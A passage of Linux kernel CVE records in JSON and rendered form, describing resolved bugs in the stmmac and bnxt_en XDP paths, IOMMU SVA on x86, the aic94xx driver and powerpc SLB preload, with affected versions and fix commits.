"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:55.392Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3f7823219407f2f18044c2b72366a48810c5c821"
},
{
"url": "https://git.kernel.org/stable/c/4d0ceb7677e1c4616afb96abb4518f70b65abb0d"
},
{
"url": "https://git.kernel.org/stable/c/45ee0462b88396a0bd1df1991f801c89994ea72b"
},
{
"url": "https://git.kernel.org/stable/c/5e5988736a95b1de7f91b10ac2575454b70e4897"
},
{
"url": "https://git.kernel.org/stable/c/a48e232210009be50591fdea8ba7c07b0f566a13"
}
],
"title": "net: stmmac: fix the crash issue for zero copy XDP_TX action",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71095",
"datePublished": "2026-01-13T15:34:55.392Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-13T15:34:55.392Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68770 (GCVE-0-2025-68770)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
VLAI?
EPSS
Title
bnxt_en: Fix XDP_TX path
Summary
In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Fix XDP_TX path
For XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not
correct. __bnxt_poll_work() -> bnxt_rx_pkt() -> bnxt_rx_xdp() may be
looping within NAPI and some event flags may be set in earlier
iterations. In particular, if BNXT_TX_EVENT is set earlier indicating
some XDP_TX packets are ready and pending, it will be cleared if it is
XDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we
successfully call __bnxt_xmit_xdp(). But if the TX ring has no more
room, the flag will not be set. This will cause the TX producer to be
ahead but the driver will not hit the TX doorbell.
For multi-buf XDP_TX, there is no need to clear the event flags and set
BNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in
bnxt_rx_pkt().
The visible symptom of this is that the RX ring associated with the
TX XDP ring will eventually become empty and all packets will be dropped.
Because this condition will cause the driver to not refill the RX ring
seeing that the TX ring has forever pending XDP_TX packets.
The fix is to only clear BNXT_RX_EVENT when we have successfully
called __bnxt_xmit_xdp().
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
7f0a168b0441ef7fd6b46563efb2706c58ac2a4c , < 4b83902a1e67ff327ab5c6c65021a03e72c081d6
(git)
Affected: 7f0a168b0441ef7fd6b46563efb2706c58ac2a4c , < f17e0c1208485b24d61271bc1ddc8f2087e71561 (git) Affected: 7f0a168b0441ef7fd6b46563efb2706c58ac2a4c , < 0373d5c387f24de749cc22e694a14b3a7c7eb515 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4b83902a1e67ff327ab5c6c65021a03e72c081d6",
"status": "affected",
"version": "7f0a168b0441ef7fd6b46563efb2706c58ac2a4c",
"versionType": "git"
},
{
"lessThan": "f17e0c1208485b24d61271bc1ddc8f2087e71561",
"status": "affected",
"version": "7f0a168b0441ef7fd6b46563efb2706c58ac2a4c",
"versionType": "git"
},
{
"lessThan": "0373d5c387f24de749cc22e694a14b3a7c7eb515",
"status": "affected",
"version": "7f0a168b0441ef7fd6b46563efb2706c58ac2a4c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp()."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:48.604Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4b83902a1e67ff327ab5c6c65021a03e72c081d6"
},
{
"url": "https://git.kernel.org/stable/c/f17e0c1208485b24d61271bc1ddc8f2087e71561"
},
{
"url": "https://git.kernel.org/stable/c/0373d5c387f24de749cc22e694a14b3a7c7eb515"
}
],
"title": "bnxt_en: Fix XDP_TX path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68770",
"datePublished": "2026-01-13T15:28:48.604Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-13T15:28:48.604Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71089 (GCVE-0-2025-71089)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
VLAI?
EPSS
Title
iommu: disable SVA when CONFIG_X86 is set
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu: disable SVA when CONFIG_X86 is set
Patch series "Fix stale IOTLB entries for kernel address space", v7.
This proposes a fix for a security vulnerability related to IOMMU Shared
Virtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel
page table entries. When a kernel page table page is freed and
reallocated for another purpose, the IOMMU might still hold stale,
incorrect entries. This can be exploited to cause a use-after-free or
write-after-free condition, potentially leading to privilege escalation or
data corruption.
This solution introduces a deferred freeing mechanism for kernel page
table pages, which provides a safe window to notify the IOMMU to
invalidate its caches before the page is reused.
This patch (of 8):
In the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware
shares and walks the CPU's page tables. The x86 architecture maps the
kernel's virtual address space into the upper portion of every process's
page table. Consequently, in an SVA context, the IOMMU hardware can walk
and cache kernel page table entries.
The Linux kernel currently lacks a notification mechanism for kernel page
table changes, specifically when page table pages are freed and reused.
The IOMMU driver is only notified of changes to user virtual address
mappings. This can cause the IOMMU's internal caches to retain stale
entries for kernel VA.
Use-After-Free (UAF) and Write-After-Free (WAF) conditions arise when
kernel page table pages are freed and later reallocated. The IOMMU could
misinterpret the new data as valid page table entries. The IOMMU might
then walk into attacker-controlled memory, leading to arbitrary physical
memory DMA access or privilege escalation. This is also a
Write-After-Free issue, as the IOMMU will potentially continue to write
Accessed and Dirty bits to the freed memory while attempting to walk the
stale page tables.
Currently, SVA contexts are unprivileged and cannot access kernel
mappings. However, the IOMMU will still walk kernel-only page tables all
the way down to the leaf entries, where it realizes the mapping is for the
kernel and errors out. This means the IOMMU still caches these
intermediate page table entries, making the described vulnerability a real
concern.
Disable SVA on x86 architecture until the IOMMU can receive notification
to flush the paging cache before freeing the CPU kernel page table pages.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 240cd7f2812cc25496b12063d11c823618f364e9
(git)
Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < c2c3f1a3fd74ef16cf115f0c558616a13a8471b4 (git) Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < c341dee80b5df49a936182341b36395c831c2661 (git) Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 72f98ef9a4be30d2a60136dd6faee376f780d06c (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/iommu-sva.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "240cd7f2812cc25496b12063d11c823618f364e9",
"status": "affected",
"version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
"versionType": "git"
},
{
"lessThan": "c2c3f1a3fd74ef16cf115f0c558616a13a8471b4",
"status": "affected",
"version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
"versionType": "git"
},
{
"lessThan": "c341dee80b5df49a936182341b36395c831c2661",
"status": "affected",
"version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
"versionType": "git"
},
{
"lessThan": "72f98ef9a4be30d2a60136dd6faee376f780d06c",
"status": "affected",
"version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/iommu-sva.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.2"
},
{
"lessThan": "5.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:51.079Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/240cd7f2812cc25496b12063d11c823618f364e9"
},
{
"url": "https://git.kernel.org/stable/c/c2c3f1a3fd74ef16cf115f0c558616a13a8471b4"
},
{
"url": "https://git.kernel.org/stable/c/c341dee80b5df49a936182341b36395c831c2661"
},
{
"url": "https://git.kernel.org/stable/c/72f98ef9a4be30d2a60136dd6faee376f780d06c"
}
],
"title": "iommu: disable SVA when CONFIG_X86 is set",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71089",
"datePublished": "2026-01-13T15:34:51.079Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-13T15:34:51.079Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71075 (GCVE-0-2025-71075)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
scsi: aic94xx: fix use-after-free in device removal path
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: aic94xx: fix use-after-free in device removal path
The asd_pci_remove() function fails to synchronize with pending tasklets
before freeing the asd_ha structure, leading to a potential
use-after-free vulnerability.
When a device removal is triggered (via hot-unplug or module unload),
race condition can occur.
The fix adds tasklet_kill() before freeing the asd_ha structure,
ensuring all scheduled tasklets complete before cleanup proceeds.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
2908d778ab3e244900c310974e1fc1c69066e450 , < c8f6f88cd1df35155258285c4f43268b361819df
(git)
Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < 278455a82245a572aeb218a6212a416a98e418de (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < b3e655e52b98a1d3df41c8e42035711e083099f8 (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < e354793a7ab9bb0934ea699a9d57bcd1b48fc27b (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < a41dc180b6e1229ae49ca290ae14d82101c148c3 (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < 751c19635c2bfaaf2836a533caa3663633066dcf (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < f6ab594672d4cba08540919a4e6be2e202b60007 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/aic94xx/aic94xx_init.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c8f6f88cd1df35155258285c4f43268b361819df",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "278455a82245a572aeb218a6212a416a98e418de",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "b3e655e52b98a1d3df41c8e42035711e083099f8",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "e354793a7ab9bb0934ea699a9d57bcd1b48fc27b",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "a41dc180b6e1229ae49ca290ae14d82101c148c3",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "751c19635c2bfaaf2836a533caa3663633066dcf",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "f6ab594672d4cba08540919a4e6be2e202b60007",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/aic94xx/aic94xx_init.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.19"
},
{
"lessThan": "2.6.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: aic94xx: fix use-after-free in device removal path\n\nThe asd_pci_remove() function fails to synchronize with pending tasklets\nbefore freeing the asd_ha structure, leading to a potential\nuse-after-free vulnerability.\n\nWhen a device removal is triggered (via hot-unplug or module unload),\nrace condition can occur.\n\nThe fix adds tasklet_kill() before freeing the asd_ha structure,\nensuring all scheduled tasklets complete before cleanup proceeds."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:32.116Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c8f6f88cd1df35155258285c4f43268b361819df"
},
{
"url": "https://git.kernel.org/stable/c/278455a82245a572aeb218a6212a416a98e418de"
},
{
"url": "https://git.kernel.org/stable/c/b3e655e52b98a1d3df41c8e42035711e083099f8"
},
{
"url": "https://git.kernel.org/stable/c/e354793a7ab9bb0934ea699a9d57bcd1b48fc27b"
},
{
"url": "https://git.kernel.org/stable/c/a41dc180b6e1229ae49ca290ae14d82101c148c3"
},
{
"url": "https://git.kernel.org/stable/c/751c19635c2bfaaf2836a533caa3663633066dcf"
},
{
"url": "https://git.kernel.org/stable/c/f6ab594672d4cba08540919a4e6be2e202b60007"
}
],
"title": "scsi: aic94xx: fix use-after-free in device removal path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71075",
"datePublished": "2026-01-13T15:31:28.075Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-19T12:19:32.116Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71078 (GCVE-0-2025-71078)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
powerpc/64s/slb: Fix SLB multihit issue during SLB preload
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/64s/slb: Fix SLB multihit issue during SLB preload
On systems using the hash MMU, there is a software SLB preload cache that
mirrors the entries loaded into the hardware SLB buffer. This preload
cache is subject to periodic eviction — typically after every 256 context
switches — to remove old entry.
To optimize performance, the kernel skips switch_mmu_context() in
switch_mm_irqs_off() when the prev and next mm_struct are the same.
However, on hash MMU systems, this can lead to inconsistencies between
the hardware SLB and the software preload cache.
If an SLB entry for a process is evicted from the software cache on one
CPU, and the same process later runs on another CPU without executing
switch_mmu_context(), the hardware SLB may retain stale entries. If the
kernel then attempts to reload that entry, it can trigger an SLB
multi-hit error.
The following timeline shows how stale SLB entries are created and can
cause a multi-hit error when a process moves between CPUs without a
MMU context switch.
CPU 0 CPU 1
----- -----
Process P
exec swapper/1
load_elf_binary
begin_new_exc
activate_mm
switch_mm_irqs_off
switch_mmu_context
switch_slb
/*
* This invalidates all
* the entries in the HW
* and setup the new HW
* SLB entries as per the
* preload cache.
*/
context_switch
sched_migrate_task migrates process P to cpu-1
Process swapper/0 context switch (to process P)
(uses mm_struct of Process P) switch_mm_irqs_off()
switch_slb
load_slb++
/*
* load_slb becomes 0 here
* and we evict an entry from
* the preload cache with
* preload_age(). We still
* keep HW SLB and preload
* cache in sync, that is
* because all HW SLB entries
* anyways gets evicted in
* switch_slb during SLBIA.
* We then only add those
* entries back in HW SLB,
* which are currently
* present in preload_cache
* (after eviction).
*/
load_elf_binary continues...
setup_new_exec()
slb_setup_new_exec()
sched_switch event
sched_migrate_task migrates
process P to cpu-0
context_switch from swapper/0 to Process P
switch_mm_irqs_off()
/*
* Since both prev and next mm struct are same we don't call
* switch_mmu_context(). This will cause the HW SLB and SW preload
* cache to go out of sync in preload_new_slb_context. Because there
* was an SLB entry which was evicted from both HW and preload cache
* on cpu-1. Now later in preload_new_slb_context(), when we will try
* to add the same preload entry again, we will add this to the SW
* preload cache and then will add it to the HW SLB. Since on cpu-0
* this entry was never invalidated, hence adding this entry to the HW
* SLB will cause a SLB multi-hit error.
*/
load_elf_binary cont
---truncated---
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
5434ae74629af58ad0fc27143a9ea435f7734410 , < 01324c0328181b94cf390bda22ff91c75126ea57
(git)
Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < 2e9a95d60f1df7b57618fd5ef057aef331575bd2 (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < c9f865022a1823d814032a09906e91e4701a35fc (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < b13a3dbfa196af68eae2031f209743735ad416bf (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < 895123c309a34d2cfccf7812b41e17261a3a6f37 (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < 4ae1e46d8a290319f33f71a2710a1382ba5431e8 (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < 00312419f0863964625d6dcda8183f96849412c6 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/include/asm/book3s/64/mmu-hash.h",
"arch/powerpc/kernel/process.c",
"arch/powerpc/mm/book3s64/internal.h",
"arch/powerpc/mm/book3s64/mmu_context.c",
"arch/powerpc/mm/book3s64/slb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "01324c0328181b94cf390bda22ff91c75126ea57",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "2e9a95d60f1df7b57618fd5ef057aef331575bd2",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "c9f865022a1823d814032a09906e91e4701a35fc",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
